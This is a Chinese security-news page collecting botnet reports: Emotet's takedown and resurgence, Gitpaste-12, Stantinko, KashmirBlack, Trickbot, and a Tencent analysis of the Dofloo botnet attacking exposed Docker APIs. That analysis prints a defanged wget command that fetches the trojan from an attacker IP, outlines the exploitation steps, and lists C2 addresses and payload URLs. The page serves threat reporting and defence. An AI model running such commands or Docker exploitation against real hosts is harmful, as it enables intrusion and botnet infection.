标签: 僵尸网络

僵尸网络 Emotet 基础设施被取缔

全球最危险的恶意软件僵尸网络在全球执法部门共同合作,历经两年的不懈打击下终于被取缔。在欧洲刑警组织、美国联邦调查局、英国国家犯罪局和其他机构的联合行动中,终于控制和取缔了 Emotet 僵尸网络的基础设施。 Emotet 在 2014 年首次以银行木马的形式出现,但随后演变成为网络犯罪分子最强大的恶意软件之一。Emotet 通过自动钓鱼邮件建立一个后门进入 Windows 电脑系统,分发被恶意软件入侵的 Word 文档。Emotet 活动中的电子邮件和文件的主题会被定期更改,以提供最好的机会引诱受害者打开电子邮件并安装恶意软件–常规主题包括发票、发货通知和有关 COVID-19 的信息。 然后,操纵 Emotet 背面的人将这些受感染的设备出租给其他网络犯罪分子,作为额外恶意软件攻击的通道,包括远程访问工具(RAT)和勒索软件。这导致 Emotet 成为欧洲刑警组织所描述的 “世界上最危险的恶意软件 “和 “过去十年中最重要的僵尸网络之一”,像 Ryuk 勒索软件和 TrickBot 银行木马这样的行动雇用访问被 Emotet 入侵的机器,以便安装自己的恶意软件。 因此对 Emotet 的取缔是近年来对恶意软件和网络犯罪分子重要的一次打击活动。欧洲刑警组织欧洲网络犯罪中心(EC3)行动负责人费尔南多·鲁伊斯(Fernando Ruiz)表示:“这可能是我们最近影响最大的行动之一,我们预计它将产生重要的影响。我们对行动结果非常满意”。 世界各地的执法机构经过一周的行动,获得了 Emotet 在全球数百台服务器的基础设施的控制权,并从内部破坏了它。被Emotet感染的机器现在被引导到执法机构控制的基础设施上,这意味着网络犯罪分子无法再利用被入侵的机器,恶意软件也无法再传播到新的目标,这将对网络犯罪行动造成极大的干扰。 Ruiz 表示:“Emotet在很长一段时间内都是我们的头号威胁,拿下它将产生重要影响。Emotet参与了30%的恶意软件攻击;成功拿下将对犯罪环境产生重要影响。我们预计它会产生影响,因为我们正在移除市场上的主要投放者之一–肯定会有一个缺口,其他犯罪分子会试图填补,但在一段时间内,这将对网络安全产生积极影响”。 对Emotet的调查还发现了一个被盗电子邮件地址、用户名和密码的数据库。人们可以通过访问荷兰国家警察网站来检查他们的电子邮件地址是否被Emotet泄露。欧洲刑警组织还与世界各地的计算机应急小组(CERT)合作,帮助那些已知感染Emotet的人。         (消息来源:cnBeta;封面源自网络)

Emotet 僵尸网络每天攻击数 10 万个邮箱

经过将近两个月的休整之后,Emotet僵尸网络复苏,并开展了每天数十万个网络攻击活动。 Emotet僵尸网络于2014年以银行木马的身份诞生,并发展成提供全方位服务的威胁传递机制。它可在受害者计算机上安装一系列包括信息窃取者、电子邮件收集器、自我传播机制等恶意软件。该僵尸网络最近一次出现是在10月份,目标群体是民主党全国委员会(DNC)志愿者。五个月的中断之后,它在7月重新活跃,并丢弃了Trickbot木马。2月份的一次竞选活动中,有人发现了来自受害者银行的短信。 Cofense研究人员布拉德·哈斯(Brad Haas)在星期二的博客中说:“Emotet僵尸网络后是恶意电子邮件活动最多的发件人之一,但通常一次休眠数周或数月。” “今年,这种中断从2月持续到7月中旬,这是Cofense在过去几年中看到的最长的中断。从那以后,他们观察到整个十月底的Emotet僵尸网络活动正常,直到今天都没有新的案例。” 研究人员说,僵尸网络在有效载荷方面也始终如一。在十月份,最常见的辅助负载是TrickBot、Qakbot和ZLoader,而今天我们观察到的是TrickBot。 TrickBot恶意软件是众所周知的复杂木马,于2016年作为银行恶意软件首次开发,与Emotet一样,它具有自我转换和添加新功能 以 逃避检测 或增强其感染能力的历史。感染了TrickBot木马的用户的设备将成为僵尸网络的一部分,黑客可使用该僵尸网络加载第二阶段的恶意软件,研究人员称其为“几乎所有其他恶意软件有效负载的理想丢弃程序”。TrickBot感染的典型后果是银行帐户被接管、高额电汇欺诈和勒索软件攻击。它最近实现了旨在检查目标系统的UEFI / BIOS固件的功能。微软和其他公司于10月对恶意软件的基础架构进行拆除之后,该恶意软件却严重复苏。 Proofpoint在Twitter上指出: “我们看到了相关英文、德文、西班牙文、意大利文并受密码保护的zip和URL的线程劫持的带有Word附件的诱饵。” Proofpoint威胁研究高级主管Sherrod DeGrippo说:“我们的团队仍在审核新样品,到目前为止,我们只发现了微小的变化。例如,Emotet二进制文件现在被用作DLL而不是.exe。当Emotet运行时,我们每天会观察到数十万封电子邮件。”她指出:“我们通常会看到Emotet在12月24日至1月初停止运营。如果他们继续这种模式,那么最近的活动对他们来说将是短暂而罕见的。” 研究人员同时指出,“黑客在不同的网络诱饵之间交替变化,以使社会工程学用户能够使用包括COVID-19主题的宏。尽管缺乏重大发展,该恶意软件的复兴仍应引起人们的注意。” 鉴于今年的严峻形势,安全人员建议相关组织和个人应提高警惕,并继续采取相关保护措施。         消息及封面来源:Threat Post;译者:江。 本文由 HackerNews.cc 翻译整理。 转载请注明“转自 HackerNews.cc ” 

Gitpaste-12 僵尸网络重新瞄准 Linux 服务器和物联网设备

一种新的蠕虫僵尸网络通过GitHub和Pastebin传播,在目标系统上安装加密货币矿工和后门,并扩展了攻击web应用程序、IP摄像机和路由器的能力。 上个月初,Juniper威胁实验室的研究人员记录了一个名为“Gitpaste-12”的加密挖掘活动,该活动使用GitHub来托管包含多达12个已知攻击模块的恶意代码,这些代码通过从Pastebin URL下载的命令执行。 这些攻击发生在2020年10月15日开始的12天中,而Pastebin URL和存储库于2020年10月30日被关闭。 现在,根据Juniper的说法,第二波攻击始于11月10日,使用的是来自不同GitHub存储库的有效负载,其中包括一个Linux加密矿工(ls)、一个包含暴力尝试密码列表的文件(pass),以及一个针对x86_64 Linux系统的本地权限提升漏洞。 最初的感染是通过X10-unix(一种用Go编程语言编写的二进制文件),然后从GitHub下载下一阶段的有效负载。 Juniper的研究员Asher Langton指出,“该蠕虫针对web应用程序、IP摄像头、路由器等进行了一系列广泛的攻击,涉及至少31个已知漏洞(其中7个漏洞在之前的Gitspaste-12示例中也出现过),试图破坏开放的Android Debug Bridge连接和现有恶意软件后门。” 31个漏洞中包括F5 BIG-IP流量管理用户界面(CVE-2020-5902)、Pi-hole Web(CVE-2020-8816)、Tenda AC15 AC1900(CVE-2020-10987)、vBulletin(CVE-2020-17496),以及FUEL CMS(CVE-2020-17463),这些漏洞都是今年曝光的。 值得注意的是,今年10月,人们观察到Mirai僵尸网络的新变种Ttint利用包括CVE-2020-10987在内的两个Tenda路由器零日漏洞,传播能够执行拒绝服务攻击、执行恶意命令、实现远程访问的反向shell的远程访问木马(RAT)。 除了在机器上安装X10-unix和Monero加密挖掘软件外,该恶意软件还打开了监听端口30004和30006的后门,将受害者的外部IP地址上传到私有的Pastebin,并试图连接到5555端口上的Android Debug Bridge连接。 连接成功后,它继续下载Android APK文件(“weixin.apk”),最终安装了一个ARM CPU版本的X10-unix。 据Juniper估计,总共至少有100个不同的宿主被发现传播这种感染。 完整的恶意二进制文件和其他与活动相关的危害指标(IOC)可以在这里访问。       消息及封面来源:The Hacker News ;译者:芋泥啵啵奶茶。 本文由 HackerNews.cc 翻译整理。 转载请注明“转自 HackerNews.cc ” 

Stantinko 僵尸网络正在瞄准 Linux 服务器以隐藏代理

至少自2012年以来,一个广告软件和投币商僵尸网络以俄罗斯、乌克兰、白俄罗斯和哈萨克斯坦为目标,目前已将目光投向了Linux服务器。 Intezer的分析报告指出,该木马伪装成Linux服务器上常用的HTTPd程序,它是一个新版本恶意软件,被跟踪为Stantinko。 早在2017年,ESET的研究人员就详细描述了一个庞大的广告软件僵尸网络,它通过欺骗寻找盗版软件的用户下载伪装成torrents的恶意可执行文件,安装执行广告注入和点击欺诈的流氓浏览器扩展程序。该僵尸网络控制着50万台机器,以加密挖矿的形式从他们控制的计算机中获利。 尽管Stantinko传统上是一个Windows恶意软件,但他们存在针对Linux的扩展工具。ESET观察到一个Linux木马代理通过恶意二进制文件部署在受损服务器上。 Intezer的最新研究提供了对该Linux代理的全新见解,特别是同一恶意软件(v1.2)的较新版本(v2.17),称为“httpd”,其中一个恶意软件样本已于11月7日从俄罗斯上传到VirusTotal。 执行后,“httpd”将验证与恶意软件一起提供的“etc/pd.d/proxy.conf”中的配置文件,并通过创建套接字和侦听器以接受研究人员认为是其他受感染系统的连接。 来自受感染客户机的HTTP Post请求传递到受攻击者控制的服务器上,然后该服务器使用代理转发回客户端进行响应。 如果未受感染的客户端向受损服务器发送HTTP Get请求,则会发回HTTP 301重定向到配置文件中指定的预配置URL。 Intezer的研究人员指出,新版恶意软件只起到代理的作用,新变种与旧版本共享多个函数名,一些硬编码路径与之前的Stantinko活动有相似之处。 “Stantinko是最新一个针对Linux服务器的恶意软件,这种恶意软件与利用受损Linux服务器的攻击活动有很大联系。”         消息及封面来源:The Hacker News ;译者:芋泥啵啵奶茶。 本文由 HackerNews.cc 翻译整理。 转载请注明“转自 HackerNews.cc ” 

Gitspaste-12 新型蠕虫僵尸网络通过 GitHub 和 Pastebin 传播

Gitpaste-12是Juniper Threat Labs最近发现的一种新蠕虫,它使用GitHub和Pastebin来存储组件代码,并且至少提供12种不同的攻击模块。 目前,该恶意软件正在开发中,它的目标是基于Linux的x86服务器,以及基于Linux ARM和MIPS的物联网设备。   更多内容请至Seebug Paper  阅读全文:https://paper.seebug.org/1394/     消息来源:JUNIPER,封面来自网络,译者:芋泥啵啵奶茶。 本文由 HackerNews.cc 翻译整理。 转载请注明“转自 HackerNews.cc ” 并附上原文链接。

俄罗斯黑客因僵尸网络数据收集计划而入狱

俄罗斯网络犯罪分子因参与一个造成至少1亿美元经济损失的僵尸网络计划而被判入狱8年。 据悉,犯罪分子Aleksandr Brovko是“数个精英在线论坛的活跃成员,这些论坛旨在为讲俄语的网络犯罪分子收集和交换其犯罪工具和服务。”Brovko编写了能够解析来自僵尸网络来源的数据脚本,搜索了数据转储以盗取个人身份信息(PII)和帐户凭据。 美国司法部声称:“Brovko攻击了超过200,000台未经授权的个人识别信息或金融帐户访问设备。” 2007年到2019年,Brovko持续参与该网络攻击计划,并被美国高级地方法院TS Ellis III判处八年徒刑。     消息来源:zdnet;封面来自网络;译者:小江。 本文由 HackerNews.cc 翻译整理。 转载请注明“转自 HackerNews.cc ” 并附上原文链接。

KashmirBlack 僵尸网络劫持了数千个运行在主流 CMS 平台上的网站

该僵尸网络利用几十个已知的漏洞来攻击广泛使用的内容管理系统(CMS)。KashmirBlack活动于2019年11月开始,其目标是WordPress,Joomla!,PrestaShop,Magneto,Drupal,Vbulletin,OsCommerence,OpenCart和Yeager等流行的CMS平台。 Imperva的研究人员表示:“其精心设计的基础架构可以轻松地扩展和添加新的攻击或有效负载,并且使用复杂的方法来伪装自身,使其不被发现并保护自身运行。” 这家网络安全公司对僵尸网络进行了为期六个月的调查,结果显示,该复杂操作由一台命令控制(C2)服务器和60多个代理服务器管理,这些服务器与僵尸网络进行通信以发送新目标,从而扩大了规模通过暴力攻击和安装后门来访问僵尸网络。 KashmirBlack的主要目的是滥用受感染系统的资源进行Monero加密货币挖掘,并将网站的合法流量重定向到垃圾邮件页面。但是,它也被用来进行defacement攻击。 无论出于何种动机,他们利用PHPUnit RCE漏洞(CVE-2017-9841)用与C2服务器通信的下一阶段恶意有效载荷感染客户。 Imperva的研究人员表示,根据它在一次此类defacement中发现的攻击特征,他们认为僵尸网络是一个名叫Exect1337的黑客的作品,该黑客是印度尼西亚黑客团队PhantomGhost的成员。 KashmirBlack的基础架构很复杂,包括两个单独的存储库,一个用于托管漏洞利用程序和有效负载,另一个用于存储恶意脚本以与C2服务器通信。 僵尸程序本身要么被指定为“传播僵尸程序”(与C2通信以接收感染新受害者的命令的受害者服务器),要么被指定为“待定僵尸程序”(其在僵尸网络中的用途尚待确定)。 尽管使用CVE-2017-9841将受害者转变为传播中的僵尸程序,但成功利用CMS系统中的15种不同缺陷导致受害者站点成为僵尸网络中新的未确定的僵尸程序。KashmirBlack攻击者使用了一个单独的WebDAV文件上传漏洞来进行攻击。 但是,随着僵尸网络规模的扩大,越来越多的僵尸网络开始从存储库中获取有效负载,他们的基础架构已进行了调整,使其通过添加负载平衡器实体来变得更具可伸缩性,该实体返回新设置的冗余存储库之一的地址。 KashmirBlack的最新版本也许是最阴险的。上个月,研究人员发现僵尸网络使用Dropbox替代了其C2基础架构,滥用了云存储服务的API来获取攻击指令并从传播中的僵尸网络上载攻击报告。 Imperva说:“转移到Dropbox可使僵尸网络将合法的Web服务隐藏在非法犯罪活动中。” “这是伪装僵尸网络流量,确保C&C操作安全的又一步,而且最重要的是,我们很难将僵尸网络追溯到操作背后的黑客。”     消息来源:The Hacker News ;封面来自网络;译者:芋泥啵啵奶茶。 本文由 HackerNews.cc 翻译整理。 转载请注明“转自 HackerNews.cc ” 并附上原文链接。

Interplanetary Storm Golang 僵尸网络

Bitdefender的研究人员发现Interplanetary Storm Golang僵尸网络可以用作高度匿名的proxy-network-as-a-service和基于订阅的模型租用。攻击者精通使用Golang和开发实践,并且善于隐藏管理节点。Interplanetary Storm还有一个复杂的、模块化的设备,该设备用来寻找新目标、推送和同步新版本恶意软件,对被感染者执行任意命令并与C2服务器通信公开web API。 … 更多内容请至Seebug Paper 阅读全文:https://paper.seebug.org/1373/       消息与封面来源:bitdefender  ,译者:芋泥啵啵奶茶 本文由 HackerNews.cc 翻译整理。 转载请注明“转自 HackerNews.cc ” 并附上原文链接。

微软捣毁了臭名昭著的 Trickbot 勒索软件僵尸网络

微软今天宣布,它破坏了Trickbot僵尸网络,这是世界上最臭名昭著的传播勒索软件的僵尸网络之一。自2016年底以来,Trickbot已经感染了超过100万台设备。微软与世界各地的网络运营商合作,拿下了Trickbot的关键基础设施,这样恶意软件运营者将无法再利用这个基础设施来分发恶意软件或勒索软件。 Trickbot不是一个简单的恶意软件,任何免费的反病毒软件都可以检测到,它在受影响的设备中不断进化。 Trickbot是一个多阶段的恶意软件,通常由一个外壳、一个加载器和一个主恶意软件模块组成。外壳使用多个不断变化的模板,旨在通过产生独特的样本来逃避检测,即使主要的恶意软件代码保持不变。 希望了解更多有关勒索软件与僵尸网络的内幕,您可以在微软的相关博客中获取更多资料: https://blogs.microsoft.com/on-the-issues/2020/10/12/trickbot-ransomware-cyberthreat-us-elections/     (稿源:cnBeta,封面源自网络。)

Dofloo(AESDDoS)僵尸网络正批量扫描、攻击 Docker 容器

感谢腾讯御见威胁情报中心来稿! 原文链接:https://mp.weixin.qq.com/s/ceNfVRneGGIkbFOqItU11g  一、概述 腾讯安全威胁情报中心检测到Dofloo(AESDDoS)僵尸网络正批量扫描和攻击Docker容器。部分云主机上部署的Docker容器没有针对远程访问做安全认证,存在Remote API允许未授权使用漏洞且暴露在公网,导致黑客通过漏洞入侵并植入Dofloo僵尸网络木马。 云计算兴起后,服务器硬件扩展非常便利,软件服务部署成为了瓶颈,Docker作为开源的引擎可以轻松地为任何应用创建一个轻量级的、可移植的、自给自足的容器,因而逐渐得到广泛应用。 而开发者在部署Docker时未对相关服务进行正确合理的配置导致其容易成为黑客入侵的路径之一,之前已有H2Miner利用Docker漏洞进行入侵挖矿的案例被披露(https://mp.weixin.qq.com/s/iNq8SdTZ9IrttAoQYLJw5A)。此次Dofloo僵尸网络入侵系统后,会搜集系统敏感信息并加密上传,接收C&C服务器指令,执行各类DDoS攻击。 腾讯安全系列产品已支持检测Dofloo(AESDDoS)僵尸网络的最新变种,企业安全运维人员如果发现已经中招,可对照分析报告的详细内容,将攻击者下载安装的文件和启动项删除,再参考以下安全响应清单进行排查,修复Remote API允许未授权使用的漏洞,避免再次遭遇入侵。 具体响应清单如下: 应用 场景 安全产品 解决方案 威 胁 情 报 腾讯T-Sec 威胁情报云查服务 (SaaS) 1)Dofloo僵尸网络相关IOCs已入库。 各类安全产品可通过“威胁情报云查服务”提供的接口提升威胁识别能力。可参考:https://cloud.tencent.com/product/tics 腾讯T-Sec 高级威胁追溯系统 1)Dofloo僵尸网络相关信息和情报已支持检索。 网管可通过威胁追溯系统,分析日志,进行线索研判、追溯网络入侵源头。T-Sec高级威胁追溯系统的更多信息,可参考:https://cloud.tencent.com/product/atts 云原生安全 防护 云防火墙 (Cloud Firewall,CFW) 基于网络流量进行威胁检测与主动拦截,已支持: 1)Dofloo僵尸网络关联的IOCs已支持识别检测; 2)检测Docker未授权访问漏洞利用攻击。   有关云防火墙的更多信息,可参考: https://cloud.tencent.com/product/cfw 腾讯T-Sec  主机安全 (Cloud Workload Protection,CWP) 1)已支持查杀Dofloo僵尸网络相关木马程序; 2)已支持Docker Daemon 2375管理端口开启的风险项检测。 腾讯主机安全(云镜)提供云上终端的防毒杀毒、防入侵、漏洞管理、基线管理等。关于T-Sec主机安全的更多信息,可参考:https://cloud.tencent.com/product/cwp 腾讯T-Sec 安全运营中心 基于客户云端安全数据和腾讯安全大数据的云安全运营平台。已接入腾讯主机安全(云镜)、腾讯御知等产品数据导入,为客户提供漏洞情报、威胁发现、事件处置、基线合规、及泄漏监测、风险可视等能力。 关于腾讯T-Sec安全运营中心的更多信息,可参考:https://s.tencent.com/product/soc/index.html 非云企业安全防护 腾讯T-Sec 高级威胁检测系统 (腾讯御界) 1)已支持通过协议检测Dofloo僵尸网络与服务器的网络通信; 2)检测Docker未授权访问漏洞利用攻击; 3)检测DDoS攻击流量;   关于T-Sec高级威胁检测系统的更多信息,可参考: https://cloud.tencent.com/product/nta 二、样本分析 在此次攻击中,攻击者首先通过向端口2375(与Docker守护进程通信的默认端口)发送TCP SYN数据包对给定的IP范围进行批量扫描。确定开放端口的目标IP后,发送请求调用/containers/json接口获取正在运行中的容器列表,之后使用Docker EXEC命令执行以下shell访问公开主机中所有正在运行的容器并下载木马Linux2.7。 获取容器列表: 针对运行状态的容器利用Docker EXEC执行木马下载命令: wget -P /tmp/ http[:]//49.235.238.111:88/Linux2.7 被下载的Dofloo僵尸网络木马Linux2.7会连接到49.235.238.111:48080来发送和接收来自攻击者的远程shell命令。 Dofloo僵尸网络还会在从被感染系统窃取信息,包括操作系统版本,CPU型号、速度和类型。 通过将自身路径写入/etc/rc.local、/etc/rc.d/rc.local、/etc/init.d/boot.local文件中以添加为自启动项。 使用AES算法对窃取的系统信息和命令和控制(C&C)数据进行加密。 此Dofloo变种能够发起各种类型的DDoS攻击,包括DNS、SYN,LSYN,UDP,UDPS,TCP和CC Flood。 IOCs C&C 49.235.238.111:48080 175.24.123.205: 48080 IP 49.235.238.111 89.40.73.126 175.24.123.205 URL http[:]//49.235.238.111[:]88/Linux2.7 http[:]//49.235.238.111/Lov.sh http[:]//49.235.238.111/lix http[:]//49.235.238.111/Verto http[:]//49.235.238.111[:]88/NgYx http[:]//49.235.238.111/linux-arm http[:]//49.235.238.111/shre.sh http[:]//89.40.73.126[:]8080/Linux2.7 http[:]//89.40.73.126/linux2.6 http[:]//89.40.73.126[:]8080/linux-arm http[:]//89.40.73.126[:]8080/Linux2.6 http[:]//89.40.73.126[:]8080/YmY http[:]//89.40.73.126[:]8080/LTF http[:]//89.40.73.126[:]8080/NgYx http[:]//89.40.73.126[:]8080/Mar http[:]//89.40.73.126[:]8080/linux2.6 http[:]//89.40.73.126[:]8080/Flood http[:]//175.24.123.205:88/Fck MD5 Flood 0579a022802759f98bfdf08e7dd16768 Linux2.7 0b0f1684f6791d9f8c44a036aa85a2cc lix 9530e46caab834e1e66a108e15ea97ca linux-arm ca1f347447ddf7990ccd0d6744f3545d Linux 05f28784a0da0c1e406d98c02dc7d560 arm 34eeb9eaa65c4a062311a886dd0157f1 Fck df86da9e341c3a9822f30ac4eba11951 Lov.sh 83caa873cee081162c417eb8dec4a351 Rze.sh 48c910cd9a07404fbfb8bf52847e72c3 SHre.sh bb7cdf5707a857036cd41af4bafaed31 参考链接: https://www.trendmicro.com/en_us/research/19/f/aesddos-botnet-malware-infiltrates-containers-via-exposed-docker-apis.html https://github.com/SPuerBRead/Docker-Remote-API-Exploit/blob/master/dockerAPI_Exploit.py